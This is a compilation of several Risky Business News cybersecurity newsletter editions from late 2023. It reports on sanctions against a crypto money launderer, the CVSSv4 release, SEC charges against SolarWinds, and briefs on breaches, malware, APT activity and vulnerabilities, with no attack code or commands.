Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq talk about the internet-melting 1988 Morris Worm and how cyber security has changed since then.
This newsletter is brought to you by asset inventory and network visibility company runZero. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The US Treasury has sanctioned a Russian businesswoman named Ekaterina Zhdanova for helping Russian oligarchs and cybercrime gangs evade sanctions and launder stolen cryptocurrency.
Officials say Zhdanova worked as an intermediary in order to obfuscate the real nature of various illegal transactions.
She disguised operations using traditional businesses operating overseas but also used accounts at cryptocurrency platforms that did not enforce anti-money laundering (AML/CFT) controls.
Officials say Zhdanova operated a luxury watch company with offices around the world in order to maintain access to the global financial system. She was also a customer of Garantex, a Russian cryptocurrency exchange the Treasury sanctioned in April 2022 for laundering more than $100 million in cybercrime proceeds.
According to US officials, Zhdanova was involved in laundering more than $105 million for her customers.
She allegedly helped Russian oligarchs evade sanctions imposed shortly after Russia's invasion of Ukraine.
Zhadonva allegedly helped one client move $2.3 million to Western Europe in the form of real estate purchases and investment accounts and helped another customer move $100 million from Russia to the United Arab Emirates.
Officials also believe Zhadonva is running a scheme to help Russian oligarchs obtain tax residency in the UAE and conceal their identities.
But before the war began and Zhadonva's services would be in high demand with Russian elites, officials say she worked with cybercrime groups, with one customer being one of the affiliates of the Ryuk ransomware gang, for whom she laundered more than $2.3 million in victim payments.
An article in Russian media claims Zhadonva is a former business partner of Irina Shoigu, the wife of Sergei Shoigu, Russia's Defense Minister, which may explain her connections to Russia's oligarch scene.
Zhadonva was also interviewed by one of Russia's social life magazines, where she claimed to have "conquered Moscow" after growing up in Altai, a region in Southern Siberia.
Per the US officials, Zhadonva is most likely still in Moscow. The Treasury's sanctions division has sanctioned three of Zhadonva's blockchain addresses and added her name to the OFAC list.
Image via CorruptionTV on Telegram
Breaches, hacks, and security incidents
Okta hack update: Okta has finished its investigation into the September hack of its customer support system, and the company says the intruders gained access to the data of 134 customers, representing less than 1% of its total customer base. Of all these, the hackers pivoted and accessed the networks of only five Okta customers. Three of the five customers are already known after publicly disclosing their breaches and include BeyondTrust, Cloudflare, and 1Password. Okta also blamed the hack on an employee who used a personal Google account on a work laptop. The company says the employee accidentally synced their work credentials to the personal account from where the Okta work credentials were later stolen.
Mr. Cooper cyberattack: Mortgage and lending company Mr. Cooper has shut down its IT systems in the aftermath of a cyberattack. The incident took place on October 31 and has caused a days-long outage for the company, including for its public website and payment systems. The company is the US' leading lending service.
Ace Hardware cyberattack: Almost 200 servers and 1,000 systems have been impacted by a cyberattack at Ace Hardware, one of the US' largest hardware store chains. The incident took place on October 30 and has impacted the company's ability to pick up new customer orders. Other impacted systems include warehouse management systems, reward points program, tech support call center, and the company's mobile assistant. Despite the attack, the company's 5,700 stores have remained open, although with reduced activity. [Additional coverage in BleepingComputer]
General tech and privacy
Drupal 9 EoL: Version 9 of the Drupal CMS has reached End-of-Life status on November 1, 2023.
Mandatory MFA on Oracle Cloud: Oracle has enabled multi-factor authentication by default for all its Oracle Cloud customers. The policy has been enforced for all new cloud tenants and retroactively applied to all existing customers. Oracle's move comes after Amazon also made MFA mandatory for new AWS root accounts.
Google abandons Web DRM plan: Google has abandoned its plan to develop the Web Environment Integrity API, a system that many experts believe would have created a DRM for the entire web and allowed websites to block anyone from modifying their code when rendered in a browser.
Google joins eIDAS protest: Google has joined the ranks of more than 300 companies, cybersecurity, and privacy experts that have called on EU officials to revise its upcoming eIDAS (Electronic Identification, Authentication and Trust Services) regulation. Experts have called attention to a new article added to the eIDAS regulation that will mandate web browsers to automatically trust certificates issued by EU states. Experts say the article was added to eIDAS behind a closed-door meeting and without any public review. The new requirement will allow member states to easily intercept web traffic.
VPN security audit labels: Google has started showing a special label on the Play Store pages of VPN apps that have conducted a security audit of their code. The new label reads "Independent security review" and is listed in an app's Data Safety section. Eight VPN providers have already received the label, but any VPN app maker can obtain it by submitting itself to a security review through the Mobile App Security Assessment program.
Government, politics, and policy
Domestic tech abuse bill reintroduced: US senators reintroduced a new version of the "Tech Safety for Victims of Domestic Violence, Dating Violence, Sexual Assault and Stalking Act." The bill aims to help prevent domestic abusers from using technology to stalk, harass, or control survivors. A first version was introduced last December, but the bill died in the Senate Judiciary Committee. The new bill would fund 15 clinics across the US to support victims of tech-enabled abuse and fund educational programs to train individuals to help victims.
Apple warns Armenians about state-sponsored attacks: Apple has sent private notifications to Armenians warning of state-backed hacking activity targeting their devices. This marks the fifth wave of state-backed notifications that Apple has sent to Armenian users. The first wave was sent out in 2020 during the second Nagorno-Karabakh war. The last was sent in March this year during the latest round of fighting. In pastcases, security experts found traces of the Pegasus spyware on the infected devices. [Additional coverage in ArmenPress]
Greece's Predatorgate scandal: A Mediapart investigation found that the Predator spyware was deployed to the devices of Greek politicians after victims received SMS messages from a former secretary of Kyriakos Mitsotakis, the country's current prime minister. Grigoris Dimitriadis, the former secretary, denies any involvement.
Moldova's report on Russia's hybrid warfare: Moldova's intelligence agency has published a 32-page report describing the "hybrid warfare" Russia has been using in attempts to destabilize and overthrow its government. The report is in Romanian and covers everything from hack-and-leaks to disinformation campaigns and from bribery of state officials to actual paramilitary coup attempts.
NCSC post-quantum guide: The UK's NCSC agency has published guidance to help organizations prepare for the migration to post-quantum cryptography (PQC).
ACSC translates cybersecurity guides: The Australian Cyber Security Centre has translated its five basic cybersecurity guides into 27 languages.
Sponsor section
In this Risky Business News sponsor interview, Tom Uren talks to Huxley Barbee, Security Evangelist at runZero, about finding the unknown unknowns and what is a security evangelist.
Cybercrime and threat intel
Phisher detained in Indonesia: Indonesian authorities have detained a 36-year-old man for developing and selling access to a phishing kit. The suspect was detained following a joint investigation between US, UK, Australian, Canadian, and Indonesian authorities. He faces up to 12 years in prison. The suspect is the second Indonesian arrested this year for developing and selling a phishing kit. Authorities previously arrested the owner of the 16Shop phishing kit in August. [Additional coverage in AccountingWeb]
Phisher detained in Belgium: Belgian prosecutors are asking for two years in prison and a €5,000/day fine for an 18-year-old suspect who is refusing to provide passwords to his phone, computer, and servers. Officials arrested the teen in October on suspicion of being part of a phishing gang. The prosecution says the teen is ignoring a judge's order to release the passwords to investigators. The teen's camp argues that the passwords are part of his right to remain silent. [Additional coverage in NieuwsBlad]
Umbreon sentenced: Dutch authorities have sentenced a 21-year-old man from Zandvoort to four years in prison on hacking-related offenses. Named Pepijn Van der Stap, the suspect was known on hacking forums as Umbreon. Officials say Van der Stap was the leader of a trio of hackers that broke into corporate networks, stole sensitive data, and extorted the companies by threatening to publish their data. The group asked between €100,000 and €700,000 from each victim, and officials believe Van der Stap earned more than €2.5 million through extortions or by selling the hacked data. Van der Stap also worked as a security researcher for Hadrian Security and was a volunteer for the Dutch Institute for Vulnerability Disclosure, a Dutch cybersecurity collaboration group. [h/t PogoWasRight]
JFK hackers charged: The US Department of Justice has charged two Russian nationals with hacking the taxi dispatch system at the JFK airport in New York. The duo worked with two Americans who helped promote a scheme where drivers could pay a $10 fee and skip the airport's taxi waiting line. The two Americans were charged and arrested in December 2022, and both pleaded guilty last month.
BEC recovery: The DOJ recovered $2.4 million stolen from a company in April 2021 following a BEC scam.
MFA smishing alert: The Romanian cybersecurity agency has detected a smishing campaign that targets Romanian citizens with attempts to intercept 2FA/MFA codes. The attackers claim their 2FA/MFA code was sent to the victim by accident and ask the user to send over the code, leading to their account getting compromised.
New npm malware: Six malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.
More npm malware: DevSecOps company Phylum has discovered 48 JavaScript packages passing as legitimate libraries on the official npm portal. Researchers say the malicious libraries are designed to initiate a reverse shell when the package is installed. Although the first wave of packages was removed, the attack is still ongoing.
Google Cloud Threat Horizons Report #8: In the eighth edition of its threat and trends report [PDF], the Google Cloud security team highlighted a tactic it calls Multi-Software-as-a-Service Cloud Exploitation, where threat actors take credentials from one compromised cloud system to expand to multiple SaaS platforms an organization might be using.
RTF global ransomware: The Ransomware Task Force has published its yearly report on ransomware attacks for 2022. Last year, the organization says it tracked 2,600 ransomware incidents, down from the 3,000 it tracked the year before.
"This finding is consistent with the findings of other research institutions throughout 2022. While it is unlikely that a single force is driving this decline, the Russian invasion of Ukraine, law enforcement action, and continued efforts within the security community have almost certainly been contributing factors in this decline. Yet, early indications are that ransomware incidents in 2023 will reverse this decline."
SWAT USA Drop Service: Infosec reporter Brian Krebs takes a look at SWAT USA Drop Service, an online service used by money laundering gangs to buy expensive products with stolen funds and ship them overseas to be resold and re-monetized by hackers. Krebs got a copy of the site's database after the service was recently hacked. Hooray for hackers! [Additional coverage in KrebsOnSecurity]
White Proxies: An investigation by the Qurium Media Foundation has found that proxy provider White Proxies (or White Solutions) has provided the server infrastructure used in DDoS attacks against independent news outlets in Hungary. The attacks took place in August and targeted more than 40 Hungarian news outlets that criticized the country's government and the ruling party. The biggest attacks took place in August, shortly after journalists at several outlets exposed government corruption. The International Press Institute says that more than 40 Hungarian independent news outlets faced DDoS attacks since April this year. Shortly after this report, IPI itself was targeted by a DDoS attack.
Malware technical reports
Megazord: Chinese security firm Qihoo 360 analyzes Megazord, a new version of the Akira ransomware. Another report is also available via Rising.
Knight ransomware: Fortinet researchers look at Knight, a ransomware gang that started operations in August this year and has had quite an impact in Italy. The ransomware is a rebrand of the old Cyclops gang.
GhostLocker: Uptycs looks at GhostLocker, a RaaS created by the GhostSec "hacktivist" group.
"By executing the specified C2 hunting query on Shodan, the Uptycs threat intelligence team uncovered additional IP addresses associated with GhostLocker's Affiliate Login panel."
There goes their anonymity, I guess!
Kinsing: AquaSec has spotted the Kinsing crypto-mining botnet exploiting the Looney Tunables vulnerability to elevate privileges on compromised Linux boxes.
BadCandy: Cisco Talos has published a technical analysis of BadCandy, the implant deployed on Cisco IOS XE routers via the two recent zero-days CVE-2023-20198 and CVE-2023-20273. Talos says the malware is now at v3, showing that threat actors are still actively modifying their attacks and malware to maintain access to the compromised boxes. The latest v3 modifications appear to have worked, as the Shadowserver Foundation has stopped detecting infected systems.
Socks5Systemz: A malware strain named Socks5Systemz has infected more than 10,000 Windows systems as part of a proxy rental service. The Socks5Systemz malware is typically installed as a second-stage payload on systems previously infected with the PrivateLoader or Amadey malware. According to security firm BitSight, the botnet has been live since 2016 and appears to be operated out of Russia.
DarkGate: eSentire researchers have spotted a new version of the DarkGate malware loader. Also, see a similar report from Netskope.
AsyncRAT: McAfee looks at a campaign spreading the AsyncRAT using a new infection chain.
Millenium RAT: CyFirma published a report on Millenium, a Windows remote access trojan derived from the ToxicEye RAT open-source project.
Sponsor Demo
Senior Sales Engineer Ali Cheikh demonstrates the runZero platform to Risky Business host Patrick Gray. runZero is a cyber asset management tool that combines active scanning, passive discovery, and API integrations to discover IT, OT, and IoT assets (both managed and unmanaged) across your network, including cloud, mobile, and remote environments.
APTs and cyber-espionage
Operation Covert Stalker: AhnLab has published a technical report [English] on Operation Covert Stalker, a Kimsuky spear-phishing campaign that lasted for roughly 17 months and targeted people and organizations working in North Korean politics, diplomacy, and security.
APT35 and Emennet Pasargad bounty: The US State Department has put up $10 million rewards for information on two Iranian cyber groups. The first reward is for information on members of APT35, a known cyber-espionage group that has carried out ransomware attacks against US critical infrastructure. The second reward is for Emennet Pasargad, an Iranian cybersecurity company that spread disinformation and tried to influence voters in the 2020 US Presidential Election.
Vulnerabilities, security research, and bug bounty
LLM prompt injection attacks:WithSecure and Nettitude go over various LLM prompt injection attacks that can poison AI models to modify agent output.
TeslaMate exposure: A security researcher has found ~1,000 TeslaMate dashboards exposed on the internet.
Atlassian data-wiping bug mass-exploitation: The Shadowserver Foundation warns that mass internet scans are underway for Atlassian Confluence servers that may be vulnerable to a major data-wiping vulnerability (CVE-2023-22518). The scans began after a public exploit was posted online last week. Atlassian has confirmed the exploit and urged customers once again to apply patches. In a rare statement last week, Atlassian CISO Bala Sathiamurthy urged customers to patch their Confluence servers as soon as possible and avoid potential data loss.
ActiveMQ bug was a zero-day: Security researchers at ArcticWolf and Huntress Labs say that a recently patched Apache ActiveMQ vulnerability had been under attack for more than two weeks before a patch was available. The two companies say they've found attacks against ActiveMQ servers as far back as October 10, long before Apache patched the vulnerability on October 25. Several security firms have seen hacked ActiveMQ servers encrypted with a version of HelloKitty, a ransomware family that was leaked online in October. ArcticWolf says it has also seen some servers encrypted with the TellYouThePass ransomware.
Unpatched Exchange vulnerabilities: ZDI security researcher Piotr Bazydlo says Microsoft has declined to patch four vulnerabilities in its Microsoft Exchange email server. The vulnerabilities include threeSSRFissues and one remote code execution bug. Bazydlo says that given the nature of the four security flaws and Microsoft's refusal to release patches, the only mitigation he can recommend is to restrict access to Exchange servers. Microsoft did not elaborate on why it chose not to patch the issues, but ZDI bug reports contain some pretty strict exploitation requirements, such as access to an email account's credentials.
Infosec industry
BlackHatEurope keynote: UK NCSC CTO Ollie Whitehouse and former Uber CISO Joe Sullivan will keynote the Black Hat Europe security conference in December.
New tool—Cuddlephish: Security researcher Forrest Kasler has open-sourced a tool named Cuddlephish that can be used to execute Browser-in-the-Middle phishing attacks.
Global cybersecurity workforce: The global cybersecurity workforce is estimated to have reached more than 5.5 million professionals. Even if the number is 9% higher than last year, 4 million experts are still needed worldwide to fill open positions across the industry. Latin America, Australia, and the Middle East have the biggest cybersecurity workforce gaps to fill, according to a study from cybersecurity certification platform ISC2 [PDF]. [Additional coverage in CybersecurityDive]
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss what is really at stake when it comes to cyber security.
This newsletter is brought to you by vulnerability management and analysis platform Nucleus Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The Forum of Incident Response and Security Teams (FIRST) has officially released a new version of the Common Vulnerability Scoring System (CVSS), the most widely used standard for rating the severity of software vulnerabilities using a score from 1 to 10.
With this week's release, the standard has now reached version 4.0—also more commonly known as CVSSv4.
Work on this new version began years ago and comes after a period of public comments and feedback and after a first CVSSv4 draft was presented in June at the FIRSTcon 2023 security conference.
Image via Rapid7
There are several new additions in CVSSv4 that expand CVSSv3.1, the standard that has been in use for the past several years. The four most important ones are below:
New CVSS scoring metrics have been added to improve the granularity of CVSS scores. This was done because in previous versions of the standard, you'd end up with different types of vulnerabilities bunched around the same score that didn't particularly reflect each one's severity. More scoring metrics in CVSSv4 means a better spread across the whole scale.
There are now ICS, OT, and IoT-specific scoring metrics. This includes scoring metrics such as "Safety," "Automatable," or "Recovery," which will let critical infrastructure operators know if a security flaw just looks bad on paper or if it's actually exploitable and dangerous to their networks.
New scoring metrics such as "Value Density," "Vulnerability Response Effort," and "Provider Urgency" have been added to help responders evaluate and prioritize vulnerabilities. The last two are particularly interesting since they allow vendors to tell customers that a vulnerability needs to be patched ASAP. This is a capability that was not present in the current CVSS.
The "Temporal" metrics group from CVSSv3 has been replaced with a new group called "Threat Metrics." Just like the previous one, this group deals with exploitability and proof-of-concept availability but is way easier and clearer.
Because of all the changes, the new CVSSv4 also means a new way to score vulnerabilities, and the way the scores are now calculated has also changed. While in previous versions, most CVSS scores were the "base score," in CVSSv4, we now have four types of scores, depending on which groups of "metrics" apply to a vulnerability. The four new CVSS score types are now the ones below. Use the image below to understand how they are calculated.
CVSS-B: CVSS Base Score
CVSS-BT: CVSS Base + Threat Score
CVSS-BE: CVSS Base + Environmental Score
CVSS-BTE: CVSS Base + Threat + Environmental Score
Image via Nucleus Security
As with most previous editions, CVSSv4 also comes with its own score calculator. You can probably see the differences between CVSSv3.1 and CVSSv4 just by looking at the metrics groups.
If that's not enough, BASE4 Security, Rapid7, Qualys, and Tenable published deep dives into the new standard earlier this year that will help you navigate all the changes. Nucleus Security (by coincidence, this week's sponsor) also published a YouTube video going over the new CVSSv4 changes back in June. Probably the best description of the new CVSSv4 standard comes from BASE4's write-up, which describes it as a "pursuit of precision."
Breaches, hacks, and security incidents
Advarra hack: A threat actor claims to have hacked and exfiltrated data from Advarra, a major provider of IT services to the US healthcare sector. The attack took place on October 25. The threat actor says they plan to leak the data after the company has refused to negotiate or pay a ransom. The attack has been claimed by one of the AlphV ransomware affiliates, and the company's name was listed on the AlphV dark web leak site on November 1. [Additional coverage in DataBreaches.net]
Boeing ransomware attack: Airplane maker and defense contractor Boeing has confirmed that a ransomware attack has impacted its parts and distribution business. The LockBit ransomware gang first listed Boeing's name on its dark web leak site on October 27 before the company admitted to the incident. The gang claimed it accessed Boeing's network using an unnamed zero-day. [Additional coverage in DarkReading]
Onyx Protocol crypto-heist: A threat actor has stolen $2.1 million worth of crypto assets from DeFi platform Onyx Protocol. The attacker used an illiquidity market exploit to manipulate interest rates and steal funds from the platform's wallets. According to blockchain security firm SlowMist, the same exploit was also used to steal $7.4 million from the now-defunct Hundred Finance platform back in April.
General tech and privacy
Microsoft Secure Future Initiative: Microsoft President Brad Smith has made a public pledge that Microsoft will improve the security of its cloud products. Named the Secure Future Initiative, the company's commitment comes after hackers have constantly exploited Microsoft products for attacks on government and private sector entities. Smith says the initiative will focus on three areas—the use of AI for cyber defense, fundamental changes to software engineering, and advocacy for stronger international norms. The new initiative wants to mimic a similar pledge made by Bill Gates in 2002. Named Trustworthy Computing, that initiative led to significant changes to Microsoft's security posture and the creation of what we now know as Patch Tuesday.
Microsoft Secure Future Initiative (the engineering part): As part of Microsoft's latest SFI effort, Charlie Bell, Executive Vice President of Microsoft Security, has published a blog post describing what the changes to the company's software engineering practices will entail. The effort will primarily focus on improving the company's cloud services and will center around 1) transforming software development, 2) implementing new identity protections, and 3) a faster response to cloud vulnerability reports. Microsoft will also change its signing key infrastructure, which was compromised earlier this year by a group of Chinese state-sponsored hackers.
YouTube's ad-blocking crusade: Google has confirmed that it launched a "global effort" to crack down on the use of ad blockers on YouTube. The company seems to be set in its way to bombard users with ads and prevent people with ad blockers from accessing its site. According to previous reporting, the company plans to force users to either view ads or subscribe to YouTube Premium. Those who use an ad blocker will have access to the site restricted.
New ING TLD: Google has launched a new top-level domain named ING. Because of the way the TLD was set up, all new domains must use HTTPS.
EU bans Meta's data processing: The European Data Protection Board has banned social media company Meta from processing and using the data of EU users for targeted advertising. The decision applies to all Meta sites, such as Facebook, Instagram, WhatsApp, and adjacent advertising services. The EDPB says Meta has failed to obtain the explicit consent of EU users to use their data for targeted ads. The EDPB imposed an EU-wide ban at the request of the Norwegian data protection agency, which has been investigating the company's abuses for months.
eIDAS open letter: More than 300 cybersecurity experts, researchers, and NGOs have signed an open letter asking the European Union to drop its new eIDAS (Electronic Identification, Authentication and Trust Services) regulations. Experts say new articles will force web browsers to automatically trust certificate authorities and cryptographic keys mandated by EU governments. Experts say these changes open the door to mass surveillance and the interception of encrypted web traffic across the EU. The latest modifications were adopted behind closed-door meetings and added to the eIDAS text without public debate. Signatories include Mozilla, the EFF, the Linux Foundation, Cloudflare, Fastly, and multiple VPN providers.
GoGuardian privacy invasion: An EFF investigation has found that the GoGuardian student surveillance software regularly flags innocous websites as harmful content. The GoGuardian software is used by thousands of schools to monitor the internet traffic of more than 27 millions K-12 students across the US. The EFF says GoGuardian is plagued by false positives that often flag benign educational or informative websites as harmful and sexual explicit and then flag non-existing issues to the student's schools and parents, creating unneeded stress for the monitored children.
HBO troll accounts: A Rolling Stone investigation has found that HBO executives used networks of Twitter trolls to harass TV critics who gave poor reviews of their shows.
Avast SDK bug:Avast says a bug in its SDK is to blame for Google apps being flagged as malware on Huawei and other Chinese phones.
Chrome 119: Google has released version 119 of its Chrome browser. See here for security patches and webdev-related changes. Major changes include that all cookies now have an expiration date capped at 400 days. This applies to current but has also been applied retroactively to old cookies as well. On mobile, Chrome has ended support for Android Nougat (7.0). WebSQL has also been disabled and will be removed in v123. Chrome can now also sync Tab Groups.
Government, politics, and policy
China cracks down on social media stars: Seven of China's top social media platforms have jointly announced that users with more than 500,000 followers will have to list their real names in their profiles. The move comes to deter social media stars from criticizing the government or meddling in global or national affairs. It also comes after China's Central Cyberspace Affairs Commission ordered online platforms to crack down on accounts spreading rumors or fake news. Accounts that will not reveal their real name will be demonetized and restricted. The seven platforms that notified users of the new rule include Baidu, Sina Weibo, WeChat, Douyin (TikTok), Kuaishou, Bilibili, and Xiaohongshu. [Additional coverage in GlobalTimes]
CRI summit: The White House has published the results of the third meeting of the International Counter Ransomware Initiative (CRI).
The Bletchley Declaration: Twenty-eight countries and the European Union have signed the Bletchley Declaration, a document agreeing to cooperate on the safe development of AI technologies.
Sponsor section
In this Risky Business News sponsor interview, Catalin Cimpanu talks with Patrick Garrity, VP of Marketing and security researcher at Nucleus Security, on the rise and evolution of vulnerability threat intel and how CISA KEV's new ransomware section will be a game changer.
Cybercrime and threat intel
Two Russian hackers detained: The Russian FSB has detained two men this week on accusations of carrying out cyberattacks against Russian IT systems on behalf of Ukraine. Officials detained a student from Tomsk and a 36-year-old from Belovo, Kemerovo. The FSB says the two suspects joined Ukraine's "cyber troops," received orders from Ukraine's security services, and attacked Russian critical infrastructure. The two have been charged with high treason and face prison sentences from 12 years to life in prison.
Israel-Hamas hacktivism: The number of hacktivist groups involved in the Israel-Hamas conflict has now reached 137, surpassing the 128 groups involved in the Russian-Ukrainian conflict. According to threat intelligence analyst CyberKnow, most of the groups are from Asia and have sided with the Hamas/Palestinian side. Most of the groups are carrying out DDoS attacks and website defacements. Some groups have been involved in hack-and-leak operations, but many of the hacks have proven to be fake.
Mozi botnet goes down: The Mozi botnet has finally gone down for good after a mysterious entity removed its malware from infected IoT devices across the globe. The removal took place at the end of August, with infected hosts being first removed from systems in India and then from China. Security firm ESET says the Mozi takedown was executed with a special killswitch component that was signed with the malware's original private key. The company couldn't say if the killswitch was activated by the Mozi botnet creators or by Chinese law enforcement, which detained some of the Mozi authors in June 2021. First spotted in November 2019, the botnet infected more than 1.5 million devices across its lifetime, peaking at 160,000 infected systems in September 2020.
Wiki-Slack Attack: eSentire researchers have discovered that you can use Wikipedia links to redirect Slack users to malicious sites in what they're calling the Wiki-Slack Attack.
Malware technical reports
MoneyMessage ransomware: Sophos has some details on the new-ish MoneyMessage, a ransomware gang targeting corporate networks.
SparkRAT: OALABS has published IOCs for SparkRAT, a Go-based remote access trojan spotted being abused by a Chinese threat actor.
DarkGate: Netskope researchers have spotted a new version of the DarkGate malware loader.
Blister: NCC Group has a deep dive into recent versions of the Blister malware loader, previously linked to Evil Corp.
BlackCat/AlphV: NCC Group has published IOCs from recent BlackCat/AlphV intrusions.
Sponsor Demo
Nucleus Security's COO Scott Kuffer shows Risky Business podcast host Patrick Gray their vulnerability management platform. It ingests scan outputs from a number of vulnerability identification tools, normalizes that information, and then allows vulnerability management teams to do things like assign responsibility for certain types of bugs to the correct people.
APTs and cyber-espionage
Kimsuky's FastViewer: S2W researchers have analyzed a new version of FastViewer, an Android malware strain previously used by the Kimsuky North Korean APT.
MuddyWater:DeepInstinct and Group-IB are tracking a MuddyWater spear-phishing campaign targeting Israeli entities.
Mysterious WhatsApp spy mod: Kaspersky has looked at a WhatsApp mod that contained a version of the CanesSpy spyware. The mod was being distributed to Arabic-speaking users via Telegram channels. Unclear what threat actor this was, but it is most likely espionage and intelligence collection related.
Vulnerabilities, security research, and bug bounty
SketchUp vulnerabilities: Zscaler researchers have discovered 117 vulnerabilities across the Microsoft 365 application suite related to support for 3D file formats. Zscaler says all the bugs originate from a library that supports the SketchUp (SKP) 3D format that Microsoft added in June 2022. Because of the large number of bug reports it received from Zscaler and other researchers, Microsoft temporarily disabled support for the SKP format across all Microsoft 365 apps in June this year.
Thorn SFTP vulnerabilities: Praetorian researchers have found a vulnerability (CVE-2023-47174) in Thorn SFTP Gateway Admin portals. The bug is a Java deserialization issue that can be used to execute malicious code on unpatched file-transfer systems.
WhatsApp vulnerabilities: Meta's security team has patched two vulnerabilities in the WhatsApp service. Tracked as CVE-2023-38537 and CVE-2023-38538, the two are the first security issues patched in WhatsApp this year. Both were discovered by the company's security teams.
Signal PQXDH security audit: A team of security experts has analyzed Signal's new post-quantum protocol, PQXDH.
CitrixBleed exploitation: Google's Mandiant division says it is now tracking four different threat actors exploiting the CitrixBleed vulnerability (CVE-2023-4966) to compromise corporate and government systems. At least two of these are ransomware gangs. The first attacks targeting the vulnerability were recorded at the end of August when the bug was still an unpatched zero-day. They expanded last week after free exploits were posted online.
Apache ActiveMQ exploitation: Security firms Rapid7, Censys, and the Shadowserver Foundation are reporting exploitation of a recently patched Apache ActiveMQ vulnerability tracked as CVE-2023-46604. The vulnerability was patched at the end of October, and attacks began after proof-of-concept exploit code was published online. The vulnerability is a pre-auth RCE with a severity of 10/10. According to Censys and Shadowserver, there are between 7,000 and 8,000 ActiveMQ servers currently connected to the internet. Rapid7 says some of the hacked servers were encrypted with a version of HelloKitty, a ransomware family that was leaked online in October.
ApatchMe vulnerability: Tenable researchers say that Apache Airflow instances on Amazon and Google’s cloud services are running a vulnerable version of the software. According to researchers, the servers are vulnerable to a stored XSS bug tracked as CVE-2023-29247 and also known as ApatchMe.
Vulnerable kernel drivers: VMWare Carbon Black researchers have identified 34 vulnerable kernel drivers that can be used to elevate the access of non-admin users. VMWare says it reported the issues to vendors whose drivers had valid signatures at the time of discovery, but only two fixed the reported issues.
Cisco security updates: Cisco has released or updated 25 security advisories for various products, including an advisory for two recently exploited zero-days. There is also a security update for a critical vulnerability the company tracks as CVE-2023-20048, a command injection bug in Firepower firewalls.
Infosec industry
Group-IB US expansions: After finishing its exit from the Russian market, security firm Group-IB says it's preparing for a US expansion. In today's political context, allow me to be extremely skeptical about this one.
Splunk layoffs: Security firm Splunk has laid off approximately 7% of its workforce, representing around 550 of its 8,000 total staff. CEO Gary Steele says the layoffs are part of its agreement with Cisco, which agreed to buy Splunk for $28 billion. This is Splunk's second round of layoffs this year after it also fired 4% of its staff back in January.
Acquisition news: Proofpoint has entered into an agreement to buy cloud email security company Tessian.
"The agreement is expected to close in late 2023 to early 2024, subject to customary closing conditions and required regulatory approvals. "
New tool—Raven: Security firm Cycode Labs has open-sourced a tool named Raven that can perform massive scans on GitHub Actions CI/CD workflows and report the presence of vulnerabilities and other issues.
New tool—LdrLockLiberator: Security researcher Elliot Killick has open-sourced a tool named LdrLockLiberator that can unlock locked DLLs and perform DLL hijacks.
New tool—Tetragon: Cloud security firm Cilium has open-sourced Tetragon, an eBPF-based security solution for Kubernetes environments.
Risky Business Podcasts
In this edition of Between Two Nerds, Tom Uren and The Grugq discuss what is really at stake when it comes to cyber security.
This newsletter is brought to you by vulnerability management and analysis platform Nucleus Security. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:
The US Securities and Exchange Commission has filed fraud charges against software company SolarWinds and its chief information security officer, Timothy Brown.
The agency says it reviewed internal communications and security assessments and found that SolarWinds lied about its cybersecurity posture to investors for years before it was hacked in 2020.
The SEC says that for at least two years before the hack, the company—through its CISO—had learned and discussed its cybersecurity deficiencies but misrepresented the risks to investors.
Gurbir S. Grewal, the Director of the SEC's Division of Enforcement, says SolarWinds and Brown ignored "repeated red flags" and mentioned "only generic and hypothetical risks" in its public documents.
The SEC's lawsuit [PDF] comes with tens of pages listing a long list of SolarWinds cybersecurity and risk assessment deficiencies that paint an extremely grim picture of the company's internal culture.
Failure to consistently maintain a secure development lifecycle (SDL) for its software
Failure to enforce the use of strong passwords on all systems
Failure to remedy access control problems that persisted for years
Failure to fix vulnerabilities in its software in time
Understaffing of its cybersecurity roles
The SEC lawsuit points the finger at Brown for the company's cybersecurity issues. It also reveals that Brown lied to cybersecurity firms investigating the hack. This may not be a crime, but it obviously helped the SEC understand how SolarWinds was treating its cybersecurity obligations.
The company's hack eventually came to light in December 2020 after Mandiant's and Microsoft's security teams discovered suspicious activity coming from their SolarWinds Orion servers.
The two companies started investigations and discovered that hackers linked to Russia's SVR intelligence agency—known as the APT29 group—broke into SolarWinds network in early 2019 and inserted malware into the company's Orion software. Through the Orion software update mechanism, the malware made its way to more than 18,000 corporate and government networks across the world, including several US federal agencies.
The SEC is not suing SolarWinds for bad security practices—otherwise, many companies and their CISOs would be already fined into the ground—but for lying to its investors.
The agency says investors lost money after SolarWinds' share price dropped by 25% when it disclosed its hack—a financial risk none were aware of at the time because SolarWinds never shared a real picture of its cybersecurity issues.
This week's charges are not a surprise since the SEC notified SolarWinds about its intention to bring charges on two separate occasions, in November 2022 and June 2023. The surprise came from the content of the SEC's complaint, which may spur a new wave of lawsuits against the company.
In the SEC's press release, Grewal says the lawsuit should be interpreted as a "strong message" to other companies to get serious about their cybersecurity practices.
The agency is seeking relief and disgorgement from SolarWinds and a bar for Brown from serving as an officer or director in other companies.
In cybersecurity circles, the case is expected to have an impact, but not the one the SEC is expecting. Because the SEC case revolves around many of SolarWinds' internal documents and chats, security experts expect to see companies record cybersecurity issues far less and only when they have to.
We've seen this in ransomware-related incidents already. Following a string of class-action lawsuits, legal teams hired to advise ransomed companies are now telling victimized orgs to not produce incident response or similar cybersecurity reports. Any such reports are to be delivered in spoken form and kept off any electronic or paper documents as much as possible since they can be subpoenaed in future lawsuits and may reveal the company to be at fault.
Having your internal security audits, emails, and Slack chats appear in an SEC lawsuit is a good reason not to have them lying around—unless some regulations and contracts specifically require a security audit to be carried out once in a blue moon.
Brown's inclusion in the SEC lawsuit is also having an impact across the CISO/CSO space, raising the same issues we've heard before about having the right person in the role and that security compliance does not mean security—both good points that have been made before. Unfortunately, these opinions and the SEC lawsuit miss one important detail, namely, if Brown had any significant power or sway inside SolarWinds' board. He probably did not.
SolarWinds CFO Barton Kalsu, who was targeted in one of the Wells notices, was not charged this week.
Breaches, hacks, and security incidents
